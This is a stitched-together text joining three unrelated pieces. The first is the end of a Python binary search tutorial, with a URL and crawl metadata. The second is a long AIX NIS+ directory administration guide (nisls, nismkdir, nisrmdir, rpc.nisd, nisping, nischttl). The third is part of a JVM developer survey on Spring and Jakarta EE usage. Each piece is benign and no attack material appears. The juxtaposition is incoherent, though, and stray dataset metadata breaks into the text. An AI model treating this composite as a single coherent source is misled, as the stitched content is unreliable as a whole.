complexity is a way of quantifying how fast or efficient an algorithm is. In the case of Binary Search, its time complexity is “O(log2n)“, which means that if we double the size of the input list, the algorithm will perform just one extra iteration. Similarly, if the input size is multiplied by a thousand, then the loop will just have to run 10 more times. Recall that in every iteration, half of the list is eliminated, so it doesn’t take very long to eliminate the entire list. Conclusion In this tutorial, we studied what Binary Search is, how it got its name, what it exactly does to find items, and how is it so fast. We discussed its efficiency in terms of time complexity, and we saw how to code it in Python. Binary Search is one of many search algorithms, and it is one of the fastest. I hope you enjoyed learning about Binary Search and see you in the next tutorial.
https://www.askpython.com/python/examples/binary-search-algorithm-in-python
CC-MAIN-2021-31
refinedweb
1,105
65.86
In my last article, back in August 2011, I discussed a method I use to modularise CSS in a website build. In this follow up I’ll introduce a means of modularising your JavaScript to make it easier for you and your teams to develop and maintain. This isn’t the only way you can do this, but it’s a method that’s been working for me – and one you could also find useful when trying to organise your projects. Recent browser wars have seemingly focused on JavaScript performance these past few years, and we’re using larger quantities of the stuff than ever before. We are moving into an era where we’ll be using more and more clientside scripting to handle what have traditionally been seen as server-side things, such as using JS template engines to render HTML. With this in mind, I’d say better organisation of your JavaScript is more important now than ever before. Before we get going, I think its worth stating that I am no hardcore JavaScript programmer. I am a frontend developer with a design background, although I do seek to improve my JavaScript skill set. This solution was born from trying to make my life easier and so hopefully it can do the same for you. My old approach Over the last few years of increasingly using more and more JavaScript on websites, I have been through a fair number of methods for organising my JavaScript, and I was never totally happy with any of them. Common methods I’d use included having one main application.js, a bunch of plug-in JavaScript files, a JavaScript library file (usually jQuery) and then, in a slightly desperate effort to make things easier to read, some functions would often end up splitting off into different JavaScript files. This often left a messy, confusing-looking JavaScript folder. This never really seemed to be a problem while it was all in my memory. But six months later, when I’d have to try to recall what I was thinking at the time of development, it would be a much harder task. Often each function would have some code that was there to check whether some elements existed or not in order to decide whether to run the rest of the function. Mostly these functions would then be looking for an event – usually click. So, something like: if ($("#features").length > 0) { $("#features a").click(function(e){ // do something });} Initially I had JavaScript written on an as-needed basis inside a DOM ready function. This very quickly became unreadable, and I remember one JavaScript file being thousands of lines long and dreading having to look at it. When I realised that this system was proving to be a little unwieldy, I then started to have all the functions I would need outside the DOM ready and just have calls to them in the DOM ready. I thought this would help, but it only created some long files, and made all my variables and functions public. This was fine until I started doing work for AOL, which required all JavaScript to be in namespaced objects. This subsequently led me to reading up about what they were and how to work with them. Having to learn about objects, properties and methods in this way was the impetus to try to step up my JavaScript game. I grew to like the namespaced object method. Every function inside of it was a private function, except for a few returned public methods and a DOM ready inside it to kick off an init() function. This coincided with an effort I was making to reduce the amount of JavaScript I was writing and rely more on better HTML, newer CSS methods and simpler interactions. I came to recognise that I was making my interactions way too complex, simply because I could. As browsers got better at handling JavaScript and the demands of the websites I was building increased, I began writing increasing amounts of JavaScript again. This was when the problem of working with one large JavaScript file showed up again. Worse, I often found that any other developers I worked with simply reverted to putting globally available functions outside of my nice namespaced object because it was simpler and easier for them. And that made my pretty JavaScript files ugly. When you read this account of how I was organising my JavaScript you can probably draw some parallels with how you may have organised your JavaScript. Generally these application.js files were growing and becoming increasingly difficult to read and maintain. My current approach Handily, while working with a team of developers at Pivotal Labs in NYC I saw a new and much better method. Although it might appear that I’m name dropping, I mention Pivotal Labs to acknowledge where I saw this method. I’ve stolen it. (Well, you can take the man out of Manchester, but not the Manchester out of the man.) At least I’m doing the honourable thing and sharing it with you. The result of this method is a much cleaner and more logical-looking JavaScript directory. All the JavaScript is now split up into different files in a logical folder structure for functions, plug-ins, templates and vendorsupplied JavaScript. You may come up with a more logical structure for your build yourself, but this is how I’m structuring it for now: - Behaviours are bits of DOM interactions the site needs. - Templates is a place to put templates for JavaScript rendering engines (Mustache, Dust and so on). - Plug-ins is where I put any JavaScript plug-ins that I have written for the application. - Vendor is for keeping library files – here jQuery and any community plug-ins that I won’t be updating. Then, instead of a DOM ready event triggering functions that check for elements on a page and doing something if it finds them, I’m using a different method of wiring everything up. What I’m actually using is an attribute on the elements that need functions, and then looking for that attribute to trigger a function. Here is how I’m doing this: The HTML DOM elements that have JS functionality associated with them are getting a data-behavior attribute, with a name of a method. In this case it is slider: <section id="features" data-...</section> Behaviour JavaScript files The JavaScript for this method lives in /js/behaviors/directory. I give the filename the same title as the behaviour name in the HTML. This keeps tracking it down and keeping tabs on individual elements much simpler as the process goes on. This is the point on static builds when my amnesia gets the better of me, and I usually forget to update the HTML to include this new JavaScript file and then wonder why it isn’t working. But in my Rails 3 applications it’s done automagically, though you may need to update the included assets in your applications. This can prove incredibly helpful to absent-minded types like me. This new JavaScript file is where I write whatever JavaScript that I want to have interacting with the DOM element, which in this case looks like this: DLN.Behaviors.slider = function(container){ container.slider({ sliderInner: container.find(".features_list"), slideAmount: 990, itemsVisible: 1, currentSet: 1, budge: 0, looping: true, quickLinks: false, speed: 250, selfCentering: false, paginatorClassname: "features_paginator", keyControls: true, onMoveFunction: false });}; This behaviour triggers a plug-in, also named slider, which lives in the /js/plugins/ directory and passes some options into it, where container is the element from the DOM that had the data-behavior. Application JavaScript In order to call these methods and pass the container element into them, we’ll first of all need to construct the objects and make new instances of them. For this, we’ll take a look at my application.js. var DLN = window.DLN || {};DLN.Behaviors = {};DLN.LoadBehavior = function(context){ if(context === undefined){ context = $(document);}context.find("*[data-behavior]").each(function(){ var that = $(this); var behaviors = that.attr('data-behavior'); $.each(behaviors.split(" "), function(index,behaviorName){ try { var BehaviorClass = DLN.Behaviors[behaviorName]; var initializedBehavior = new BehaviorClass(that); } catch(e){ // No Operation } }); });};DLN.onReady = function(){ DLN.LoadBehavior();};$(document).ready(function(){ DLN.onReady();}); So what is happening in this application.js? Let’s explore what I have been doing in a little closer detail. For this structure, we need a namespaced object to store our methods in. So I set up an object, DLN, and a Behaviors object within it by using some literal notation: var DLN = window.DLN || {};};DLN.Behaviors = {}; DLN is simply an initialism of the project name, so you don’t have to use it. Just change this to whatever suits your job. New objects inside of the namespaced object can be added – maybe for templates, helper functions or whatever – in the future, depending on what your project needs. On DOM ready the JavaScript runs a method named onReady, which in turn, runs the LoadBehavior method: DLN.onReady = function(){ DLN.LoadBehavior();};$(document).ready(function(){ DLN.onReady();}); LoadBehavior sets about looking through the DOM for any element with an attribute of data-behavior: context.find("*[data-behavior]").each(function(){ ... } When it finds an element with this attribute it first stores the element in question into a variable, which in turn stores a string of the content of the data-behavior attribute: var that = $(this);var behaviors = that.attr('data-behavior'); Storing the element in the variable that allows the element to be passed into the target behaviour later, and is a common way to get around the change of scope, when it turns out that this is not what you want or expect it to be. We’ve all been there … Using jQuery each, it loops through the behaviour names, split into an array with split(" "). This is useful so that one single DOM element can have multiple behaviours: $.each(behaviors.split(" "), function(index,behaviorName){ ... } To run the desired method, inside of a try-catch statement, we clone a dynamically selected behaviour into a variable (BehaviorClass) and then make an instance of it (initializedBehavior), passing through the element that had the data-behavior attribute (this becomes container in the behaviour JS files): try { var BehaviorClass = DLN.Behaviors[behaviorName]; var initializedBehavior = new BehaviorClass(that);} You may have observed that I have no catch on that try-catch statement – probably a rather naughty thing to have done. But this does provide a way of not generating errors if the appropriate behaviour method doesn’t exist. This probably sounds more complex than following the code with your finger and simply working out what is going on. It is this stage where some familiarity with object-oriented JavaScript is useful. The Bearded Octo article ‘OO JS in 15 mins or Less’ is a fantastic resource for understanding writing object-orientated JavaScript. Ajax You may also note that there is a context parameter in the LoadBehavior function. This is to enable you to run LoadBehavior on elements you have ajaxed into place, and not simply only the elements present at DOM ready. You just need to pass through the element you want the to LoadBehavior function to search and it will set up behaviours on ajaxed content too. So for example: DLN.LoadBehavior($("#ajaxed")); Scope The behaviours themselves, and any other objects inside the namespaced object you make, are available globally. So you can call one behaviour from another, or set globally available variables. In this example, to run the slider function from a different behaviour you could call: DLN.Behaviors.slider($("#newElementNeedsSlider")); Methods and properties inside the behaviour JS files are not available globally, unless you choose. To make them so you could define them as properties or methods of a behaviour object, so inside of a behaviour file you could define: DLN.Behavior.slider.active = true;. Then this would then be available from any other JavaScript on your site. Or, you may want to use globally accessible getter and setter functions, which you would set up a similar way. So a behaviour JavaScript could be: DLN.Behaviors.slider = function(container) { var slide_amount = 13; DLN.Behaviors.slider.setSlideAmount = function(amount) { slide_amount = amount; } DLN.Behaviors.slider.getSlideAmount = function() { return slide_amount; } // ...} Now you can globally update and retrieve a private variable to the method by: DLN.Behaviors.slider.getSlideAmount();// 13DLN.Behaviors.slider.setSlideAmount(1312);DLN.Behaviors.slider.getSlideAmount();// 1312 Alternatively, to make a property or method globally available you could just add it to the top-level object: DLN.version = "1.3.1.2"; or: DLN.error = function(msg) { alert("error! "+msg);}; Just be careful you don’t make it too hard to follow what is defined where and end up making this simple method complex. If you are going to have a lot of site-wide variables and functions to store like this, consider making an object to put them in and a logically named folder of JavaScript files to contain them. Production site For development, lots of JS files with bits of code in are OK. But for production, concatenate and minify them into one file. Asset packers are a must, or you’ll have individual requests slowing your application’s load. Rails 3 has this built in, and similar asset packers are available for most application frameworks. A quick Google returns a wealth of advice on compressing JS, such as Rails 3.1’s Asset Pipeline, Minify and YUI Compressor for .NET. Thanks to Ross Bruniges for his peer review of this tutorial Find 35 top examples of Javascript at our sister site, Creative Bloq.
https://www.creativebloq.com/javascript/get-your-javascript-order-4135704
CC-MAIN-2020-29
refinedweb
2,273
61.77
10. Consistency testing¶ For most problems, multiple flux states can achieve the same optimum and thus we try to obtain a consistent network. By this, we mean that there will be mulitple blocked reactions in the network, which gives rise to this inconsistency. To solve this problem, we use algorithms which can detect all the blocked reactions and also give us consistent networks. Let us take a toy network, like so: Here, \(v_{x}\), where \(x \in \{1, 2, \ldots, 6\}\) represent the flux carried by the reactions as shown above. [1]: import cobra [2]: test_model = cobra.Model("test_model") v1 = cobra.Reaction("v1") v2 = cobra.Reaction("v2") v3 = cobra.Reaction("v3") v4 = cobra.Reaction("v4") v5 = cobra.Reaction("v5") v6 = cobra.Reaction("v6") test_model.add_reactions([v1, v2, v3, v4, v5, v6]) v1.reaction = "-> 2 A" v2.reaction = "A <-> B" v3.reaction = "A -> D" v4.reaction = "A -> C" v5.reaction = "C -> D" v6.reaction = "D ->" v1.bounds = (0.0, 3.0) v2.bounds = (-3.0, 3.0) v3.bounds = (0.0, 3.0) v4.bounds = (0.0, 3.0) v5.bounds = (0.0, 3.0) v6.bounds = (0.0, 3.0) test_model.objective = v6 unknown metabolite 'A' created unknown metabolite 'B' created unknown metabolite 'D' created unknown metabolite 'C' created 10.1. Using FVA¶ The first approach we can follow is to use FVA (Flux Variability Analysis) which among many other applications, is used to detect blocked reactions. The cobra.flux_analysis.find_blocked_reactions() function will return a list of all the blocked reactions obtained using FVA. [3]: cobra.flux_analysis.find_blocked_reactions(test_model) [3]: ['v2'] As we see above, we are able to obtain the blocked reaction, which in this case is \(v_2\). 10.2. Using FASTCC¶ The second approach to obtaining consistent network in cobrapy is to use FASTCC. Using this method, you can expect to efficiently obtain an accurate consistent network. For more details regarding the algorithm, please see Vlassis N, Pacheco MP, Sauter T (2014). [4]: consistent_model = cobra.flux_analysis.fastcc(test_model) consistent_model.reactions [4]: [<Reaction v1 at 0x7fc71ddea5c0>, <Reaction v3 at 0x7fc71ddea630>, <Reaction v4 at 0x7fc71ddea668>, <Reaction v5 at 0x7fc71ddea6a0>, <Reaction v6 at 0x7fc71ddea6d8>] Similar to the FVA approach, we are able to identify that \(v_2\) is indeed the blocked reaction.
https://cobrapy.readthedocs.io/en/latest/consistency.html
CC-MAIN-2022-40
refinedweb
370
51.14
Using the ADO.NET Database Profile Setup To define a connection using the ADO.NET interface, you must create a database profile by supplying values for at least the basic connection parameters in the Database Profile Setup -- ADO.NET dialog box. You can then select this profile at any time to connect to your data in InfoMaker. For information on how to define a database profile, see Using database profiles. Specifying connection parameters You must supply a value for the Namespace and DataSource connection parameters and for the User ID and Password. When you use the System.Data.OleDb namespace, you must also select a data provider from the list of installed data providers in the Provider drop-down list. The Data Source value varies depending on the type of data source connection you are making. For example: DataDirect with OLE DB page and double-click the button next to the File Name box. (You can also launch the Data Link API in the Database painter by double-clicking.
https://docs.appeon.com/im2019/im_connecting_to_your_database/ch05s04.html
CC-MAIN-2020-45
refinedweb
169
57.87
Expandable File Nodes Displaying Parsed File Content The only thing that should have been, potentially, interesting about yesterday's screenshot of a config file editor was that explorer view that showed an expanded node representing a file, with subnodes matching the content of the file. So, here I'll show how to create that effect, in this case for project.xml files: I believe that knowing how to do this is going to be extremely useful for a lot of developers, especially those providing some kind of support for XML files, such as if you're creating web framework support, for example, or anything else involving XML files. Here are the steps, with all the code: - Create a module project. - Use the New File wizard, specifying the XML file's MIME type and namespace. When you finish the wizard, look in the MIME resolver. In my case, i.e., for project.xml files, I needed exactly this content in the MIME resolver, note especially the section in bold: <?xml version="1.0" encoding="UTF-8"?> <!-- To change this template, choose Tools | Templates and open the template in the editor. --> <!DOCTYPE MIME-resolver PUBLIC "-//NetBeans//DTD MIME Resolver 1.0//EN" ""> <MIME-resolver> <file> <ext name="xml"/> <resolver mime="text/x-project+xml"> <xml-rule> <element ns=""/> </xml-rule> </resolver> </file> </MIME-resolver> - Next, let's use the DataObject class to parse the file and expose the result. Add the following to the generated DataObject class: private Map<String, List<String>> entries; //We will call this method from our DataNode. //When we do so, we parse the project.xml file //and return org.w3c.dom.Node names to the DataNode: synchronized Map<String, List<String>> getEntries() { if (entries == null) { parse(); } return entries; } private void parse() { try { entries = new LinkedHashMap<String, List<String>>(); List sectionEntries = null; BufferedReader br = null; //Use the FileObject retrieved from the DataObject, //via DataObject.getPrimaryFile(), to get the input stream: br = new BufferedReader(new InputStreamReader(getPrimaryFile().getInputStream())); InputSource source = new InputSource(br); //You could use any kind of parser, depending on your file type, //though for XML files you can use the NetBeans IDE org.openide.xml.XMLUtil class //to convert your input source to a org.w3c.dom.Document object: org.w3c.dom.Document doc = XMLUtil.parse(source, false, false, null, null); org.w3c.dom.NodeList list = doc.getElementsByTagName("*"); int length = list.getLength(); for (int i = 0; i < length; i++) { org.w3c.dom.Node mainNode = list.item(i); String value = mainNode.getNodeName(); //For purposes of this example, we simply put //the name of the node in our linked hashmap: entries.put(value, sectionEntries); } } catch (IOException ex) { Exceptions.printStackTrace(ex); } catch (SAXException ex) { Exceptions.printStackTrace(ex); } } - Next, in the generated DataNode, lets create a controller for triggering the parsing and for creating a child node per node name: static class SectionChildren extends Children.Keys { private ProjectDataObject obj; private Lookup lookup; private SectionChildren(ProjectDataObject obj, Lookup lookup) { this.obj = obj; this.lookup = lookup; } //Called the first time that a list of nodes is needed. //An example of this is when the node is expanded. @Override protected void addNotify() { setKeys(obj.getEntries().keySet()); } //Called when the user collapses a node and starts working on //something else. The NetBeans Platform will notice that the list //of nodes is no longer needed, and it will free up the memory that //is no longer being used. @Override protected void removeNotify() { setKeys(Collections. emptyList()); } //Called whenever a child node needs to be constructed. @Override protected Node[] createNodes(String key) { return new Node[]{new SectionNode(key, obj.getEntries().get(key), lookup)}; } } static class SectionNode extends AbstractNode { SectionNode(String name, java.util.List entries, Lookup lookup) { super(Children.LEAF); setName(name); setIconBaseWithExtension(ENTRY_IMAGE_ICON_BASE); } } For further info on the above code, see NetBeans System Properties Module Tutorial. - Finally, you might be wondering how to trigger the above code. In other words, when/how should you determine that new child nodes should be created? Answer: rewrite the DataNode constructors: public ProjectDataNode(ProjectDataObject obj) { super(obj, new SectionChildren(obj, null)); setIconBaseWithExtension(SECTION_IMAGE_ICON_BASE); } ProjectDataNode(ProjectDataObject obj, Lookup lookup) { super(obj, new SectionChildren(obj, lookup), lookup); setIconBaseWithExtension(SECTION_IMAGE_ICON_BASE); } The bits in bold above are what I added to trigger the creating of the child nodes. And that's all. Now you can install your module and expand the node of the file type that you're interested in. Using the parse method above, you can parse the content in any way you like, so that when the DataNode creates new section nodes, the data that you've parsed will be used to set the display name (or something else) on the child nodes. Here, for example, I've parsed the project.xml file in such a way that all the module dependencies appear as the display names of the child nodes: You can also add child nodes below the existing child nodes, and so on. Apr 13 2008, 04:59:31 AM PDT Permalink thanks Posted by bloggersmosaic on April 13, 2008 at 07:51 PM PDT #
http://blogs.sun.com/geertjan/entry/expandable_file_nodes_with_parsed
crawl-002
refinedweb
836
57.27
This section describes how to use the NIS+ directory administration commands to perform specific directory-related tasks. Use the niscat -o command to list the object properties of an NIS+ directory. To use it, you must have read access to the directory object itself. To list the object properties of a directory, use niscat with the -o option, as follows: niscat -o directory-name Use the nisls command to list the contents of an NIS+ directory. To use it, you must have read rights to the directory object. To display in terse format, use: nisls [-dgLmMR] directory-name To display in verbose format, use: nisls -l [-gm] [-dLMR] directory-name To list the contents of a directory in the default short format, use one or more of the options listed below and a directory name. If you do not supply a directory name, NIS+ uses the default directory. nisls [-dLMR] nisls [-dLMR] directory-name In the following example, nisls is entered from the root master server of the root domain wiz.com.: rootmaster% nisls wiz.com.: org_dir groups_dir The following is another example entered from the root master server: rootmaster% nisls -R Sales.wiz.com. Sales.wiz.com.: org_dir groups_dir groups_dir.Sales.wiz.com.: admin org_dir.Sales.wiz.com.: auto_master auto_home bootparams cred . . . To list the contents of a directory in the verbose format, use the -l option and one or more of the options listed below. The -g and -m options modify the attributes that are displayed. If you do not supply a directory name, NIS+ uses the default directory. nisls -l [-gm] [-dLMR] nisls -l [-gm] [-dLMR] directory-name The following is an example, entered from the master server of the root domain wiz.com.: rootmaster% nisls -l wiz.com.: D r---rmcdr---r--- rootmaster.wiz.com. date org_dir D r---rmcdr---r--- rootmaster.wiz.com. date groups_dir The nismkdir command creates a nonroot NIS+ directory and associates it with a master server. (To create a root directory, use the nisinit -r command. The nismkdir command can also be used to add a replica to an existing directory.) This section describes how to add a nonroot directory and its master server to an existing system using the nismkdir command. However, adding nonroot directories is easier to do using Web-based System Manager, SMIT, or the nisserver script, described in Using NIS+ Setup Scripts. To create a directory, use: nismkdir [-m master-server] directory-name To add a replica to an existing directory, use: nismkdir -s replica-server directory-name nismkdir -s replica-server org_dir. directory-name nismkdir -s replica-server groups_dir. directory-name To create a directory, you must have create rights to its parent directory on the domain master server. First use the -m option to identify the master server and then the -s option to identify the replica, as follows: nismkdir -m master directory nismkdir -s replica directory Attention: Always run nismkdir on the master server. Never run nismkdir on the replica machine. Running nismkdir on a replica creates communications problems between the master and the replica. The following example creates the Sales.wiz.com. directory and specifies its master server, smaster.wiz.com. and its replica, rep1.wiz.com. It is entered from the root master server. rootmaster% nismkdir -m smaster.wiz.com. Sales.wiz.com. rootmaster% nismkdir -m smaster.wiz.com. org_dir.Sales.wiz.com. rootmaster% nismkdir -m smaster.wiz.com. groups_dir.Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. org_dir.Sales.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. groups_dir.Sales.wiz.com. The nismkdir command allows you to use the parent directory's servers for the new directory instead of specifying its own. However, this should not be done except in the case of small networks. See the following examples: rootmaster% nismkdir Sales.wiz.com rootmaster% nismkdir -m smaster.wiz.com. Sales.wiz.com. Because no replica server is specified, the new directory has only a master server until you use nismkdir again to assign a replica. If the Sales.wiz.com. domain already exists, the nismkdir command as shown above makes salesmaster.wiz.com. its new master server and assigns its old master server as a replica. This section describes how to add a replica server to an existing system using the nismkdir command. However, adding replicas is easier to do using Web-based System Manager, SMIT, or the nisserver script described in Using NIS+ Setup Scripts. To assign a new replica server to an existing directory, use nismkdir on the master server with the -s option and the name of the existing directory, org_dir, and groups_dir: nismkdir -s replica-server existing-directory-name nismkdir -s replica-server org_dir. existing-directory-name nismkdir -s replica-server groups_dir. existing-directory-name Because the directory already exists, the nismkdir command does not re-create it. It only assigns it the additional replica. In the following example, rep1 is the name of the new replica machine: rootmaster% nismkdir -s rep1.wiz.com. wiz.com. rootmaster% nismkdir -s rep1.wiz.com. org_dir.wiz.com. rootmaster% nismkdir -s rep1.wiz.com. groups_dir.wiz.com. Note that you cannot assign a server to support its parent domain, unless it belongs to the root domain. Attention: must run nisping from the master server on the three directories: rootmaster# nisping wiz.com. rootmaster# nisping org_dir.wiz.com. rootmaster# nisping group_dir.wiz.com. You should see results similar to the following: rootmaster# nisping wiz.com. Pinging replicas serving directory wiz.com. : Master server is rootmaster.wiz.com. Last update occurred at Wed Nov 18 19:54:38 1995 Replica server is rep1.wiz.com. Last update seen was Wed Nov 18 11:24:32 1995 Pinging ... rep1.wiz.com. It is good practice to include nisping commands for each of these three directories in the master server's /etc/crontab file so that each directory is pinged at least once every 24 hours after being updated. The nisrmdir command can remove a directory or simply dissociate a replica server from a directory.. To remove an entire directory and dissociate its master and replica servers, use the nisrmdir command without any options: nisrmdir directory-name The following example removes the manf.wiz.com. directory from beneath the wiz.com. directory: rootmaster% nisrmdir manf.wiz.com. To dissociate a replica server from a directory, use the nisrmdir command with the -s option: nisrmdir -s servername directory The following example disassociates the manfreplica1 server from the manf.wiz.com. directory: rootmaster% nisrmdir -s manfreplica1 manf.wiz.com. The nisrm command is similar to the standard rm system command. It removes any NIS+ object from the namespace, except directories and nonempty tables. To use the nisrm command, you must have destroy rights to the object. If you do not have destroy rights,. To remove a nondirectory object, use: nisrm [-if] object-name To remove nondirectory objects, use the nisrm command and provide the object names, as follows: nisrm object-name... The following example removes a group and a table from the namespace: rootmaster% nisrm -i admins.wiz.com. groups.org_dir.wiz.com. Remove admins.wiz.com.? y Remove groups.org_dir.wiz.com.? y The rpc.nisd command starts the NIS+ daemon. The daemon can run in NIS-compatibility mode, which enables it to answer requests from NIS clients as well. You do not need any access rights to start the NIS+ daemon, but you should be aware of all its prerequisites and related tasks. By default, the NIS+ daemon starts with security level 2. To start the daemon, use: startsrc -s rpc.nisd To start the daemon in NIS-compatibility mode, use: startsrc -s rpc.nisd -a "-Y" To start an NIS-compatible daemon with DNS forwarding capabilities, use: startsrc -s rpc.nisd -a "-Y -B" To start the NIS+ daemon on any server, use the command without options: startsrc -s rpc.nisd The daemon starts with security level 2, which is the default. To start the daemon with security level 0, use the -S flag: startsrc -s rpc.nisd -a "-S 0" You can start the NIS+ daemon in NIS-compatibility mode in any server, including the root master. Use the -Y (uppercase) option: startsrc -s rpc.nisd -a "-Y" If the server is rebooted, the daemon will not restart in NIS-compatibility mode unless you also edit the server's /etc/rpc.nfs file with mk_nisd -I -y -b. You can add DNS forwarding capabilities to an NIS+ daemon running in NIS-compatibility mode by adding the -B option to rpc.nisd: startsrc -s rpc.nisd -a "-Y -B" If the server is rebooted, the daemon will not restart in DNS-forwarding NIS-compatibility mode unless you also edit the server's /etc/rpc.nfs file with mk_nisd -I -y -b. To stop the NIS+ daemon, whether it is running in normal or NIS-compatibility mode, use: stopsrc -s rpc.nisd This section describes how to initialize a workstation client using the nisinit command. An easier way to do this is with the nisclient script, described in Using NIS+ Setup Scripts. The nisinit command initializes a workstation to be an NIS+ client. As with the rpc.nisd command, you do not need any access rights to use the nisinit command, but you should be aware of its prerequisites and related tasks. To initialize a client, use: nisinit -c -B nisinit -c -H hostname nisinit -c -C filename To initialize a root master server, use: nisinit -r You can initialize a client in three different ways: Each way has different prerequisites and associated tasks. For instance, before you can initialize a client by host name, the client's /etc/hosts file must list the host name you will use and the irs.conf file must have files as the first choice on the hosts line. Following is a summary of the steps that use the nisinit command. To initialize a client by host name, use the -c and -H options, and include the name of the server from which the client will obtain its cold-start file: nisinit -c -H hostname To initialize a client by cold-start file, use the -c and -C options, and provide the name of the cold-start file: nisinit -c -C filename To initialize a client by broadcast, use the -c and -B options: nisinit -c -B To initialize the root master server, use the nisinit -r command: nisinit -r startup,): startsrc -s nis_cachemgr startsrc -s nis_cachemgr -a "-i" using stopsrc -s nis_cachemgr. The nisshowcache command displays the contents of a client's directory cache. The nisshowcache command is located in /usr/lib/nis. It displays only the cache header and the directory names. The following is an example entered from the root master server: rootmaster# /usr/lib/nis/nisshowcache -v Cold Start directory: Name : wiz.com. Type : NIS Master Server : Name : rootmaster.wiz.com. Public Key : Diffie-Hellman (192 bits) Universal addresses (3) . . . Replicate: Name : rootreplica1.wiz.com. Public Key : Diffie-Hellman (192 bits) Universal addresses (3) . . . Time to live : 12:0:0 Default Access Rights : The nisping command pings servers and can automatically update local tables or a specified directory. (The replicas normally wait a couple of minutes before executing the update tasks.) Before pinging, the command checks the time of the last update received by each replica. When the time for a particular replica is the same as the last update sent by the master, nisping does not ping that replica. To display the time of the last update, type: /usr/lib/nis/nisping -u [domain] To ping replicas, type: /usr/lib/nis/nisping [domain] To ping the master server (to check whether it is available for updates), type: /usr/lib/nis/nisping -H hostname [domain] Checkpointing is the process in which each server, including the master, updates its information on disk from the domain's transaction log. You can also checkpoint a directory to update the data in that directory and its subdirectories. To checkpoint servers, use: /usr/lib/nis/nisping -C hostname [domain] To checkpoint a directory, use: /usr/lib/nis/nisping -C directoryname For more information, read the nisping command description. The nislog command displays the contents of the transaction log. For more information, see the nislog command description. To display the contents of a transaction log, use the nislog command, as follows: /usr/sbin/nislog To display the contents beginning with the first entries (header), use the -h option, as follows: /usr/sbin/nislog -h [number] To display the contents beginning with the most recent entries (trailer), use the -t option, as follows: /usr/sbin/nislog -t [number] where number is an optional argument that defines the starting line number. The nischttl command changes the time-to-live (TTL) TTL values you assign objects or entries should depend on the stability of the object. If an object is prone to frequent change, assign it a low TTL value. If it is steady, assign it a high one. A high TTL is a week; a low one is less than a minute. Password entries should have TTL values of about 12 hours to accommodate one password change per day. Entries in tables that do not change much, such as those in the RPC table, can have values of several weeks. To change the time-to-live of an object, you must have modify rights to that object. To change the TTL of a table entry, you must have modify rights to the table, entry, or columns you wish to modify. To change the time-to-live value of objects, use: nischttl time-to-live object-name nischttl [-L] time-to-live object-name To change the time-to-live value of entries, use: nischttl time-to-live [column=value,...], table-name nischttl [-ALP] time-to-live [column=value,...],table-name Where time-to-live is expressed as: These values can be used in combination. For example, a TTL value of 4d3h2m1s specifies a time to live of four days, three hours, two minutes, and one second. To display the current TTL value of an object or table entry, use the nisdefaults -t command.
http://ps-2.kev009.com/wisclibrary/aix51/usr/share/man/info/en_US/a_doc_lib/aixbman/nisplus/adm_dirs.htm
CC-MAIN-2022-33
refinedweb
2,362
56.15
using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace BookList { class Book { public string Author { get; set; } public string Title { get; set; } public decimal Price { get; set; } public Book(string author, string title, string price) { this.Author = author; this.Title = title; this.Price = Convert.ToDecimal(price); } public override string ToString() { return Author + " " + Title + " €" + Price; } public string FileWriteFormat() { //charles dickens,hard times,10 return Author + "," + Title + "," + Price; } } } Hi John, Welcome to MSDN forum. Could you please tell us what the meaning of " tips from jk" is? What do you want us support team to do with this code? This forum is mainly to discuss and ask questions about the Visual C++ IDE, libraries, samples, tools, setup, and Windows programming using MFC and ATL. Was the above code related to Visual C++? If so, what was the specific kind of this project? Please provide more details so that we could have a better understanding of this issue. Best Regards, J?
https://social.msdn.microsoft.com/Forums/en-US/2a2a26a4-c422-4ceb-bd98-a3d7ba99abf7/tips-from-jk?forum=vcgeneral
CC-MAIN-2015-22
refinedweb
166
61.22
Spring dominates the Java ecosystem with 60% using it for their main applications >! Do you use the Spring Framework? Exactly 6 out of 10 people depend on the Spring Framework for the production of their application. That is a remarkably high market share for a third-party open source framework. Keep all your Spring dependencies and other direct and transitive dependencies up to date and free of known vulnerabilities by scanning your applications and libraries quickly and for free with Snyk What Spring version do you use for your main application? Spring has been around for a long time. By introducing significant changes and innovations, Spring has evolved into the most dominant framework in the Java ecosystem. With two thirds of Spring users working with Spring 5, there’s a strong adoption rate of newer versions. Which server-side web frameworks do you use? The server-side is still a Spring-dominated world, with half of the market using Spring Boot and almost a third using Spring MVC. Frameworks like Micronaut and Quarkus probably have what it takes to compete against Spring. Nonetheless, let’s wait until next year’s report before we draw any conclusions. JHipster does not look as popular as one would expect from all the conference talks. It’s also interesting to see that JSF is still alive. Do you use Enterprise Java? (J2EE, Java EE, Jakarta EE) The question of whether Java developers use the Enterprise Edition (EE) of Java is something we ask every year. Only this year, we slightly changed the question. We added the option “Yes, via Spring or another framework (e.g. JPA or Servlets) to ensure that people who use EE indirectly do not choose the “No” option.. What Java EE version do you use for your main application? Almost 4 out of 10 people use the latest version of Java EE while Java EE 7 still remains quite popular. What’s more, 2% of developers reported that they still use J2EE and, even though this seems like a very small percentage, it is a significant number as it is almost equal to the number of people that use Scala as their main application language! It’s also important to mention that 21% of the respondents do not know the exact version of Java EE they’re using. By cross-referencing the answers to this question with the previous question, we found out that 95% of developers who are not aware of their exact Java EE version, use Java EE indirectly, namely through the Spring Framework. What was your reaction to Oracle and the Eclipse foundation not agreeing on continued usage of the javax namespace? After many months of negotiations, Oracle and the Eclipse foundation weren’t able to come to an agreement over the usage of the javax package namespace by the Eclipse Foundation Community. The javax namespace falls under trademark by Oracle which means that, moving forward, all improvements made to Jakarta EE by the Eclipse Foundation, have to use a different package name. As a result, changes to Jakarta EE are also accompanied with migration of library code. Although the change in package name clearly marks the ownership of that package — Oracle up to Java EE 8 and the Eclipse Foundation from Jakarta EE 8 onwards — it affects every API in the Enterprise Edition as they all begin with javax. When asked about this development, the vast majority of participants feel annoyed by Oracle’s position on the matter with 2 out of 3 JVM developers stating their disappointment of the negotiated outcomes. In fact, the responses to this question raise some concerns for Oracle. What if this outcome ultimately harms Oracle’s stewardship of Java? Would you consider switching to another framework/technology in order to avoid migrating to a newer Jakarta EE version, due to the javax namespace changes? Despite the majority of the respondents being rather disappointed with the javax namespace changes, only 1 out of 10 developers would switch to another framework. According to our survey, 66% of developers are probably or definitely staying with Jakarta EE despite the namespace changes. It is possible that developers believe that these changes will not affect them, since the majority of them use the EE version indirectly, via frameworks like Spring. This points to the namespace change being more of a disappointing annoyance rather than anything developers really take action over. What other languages does your application use? Not many people use a single language for 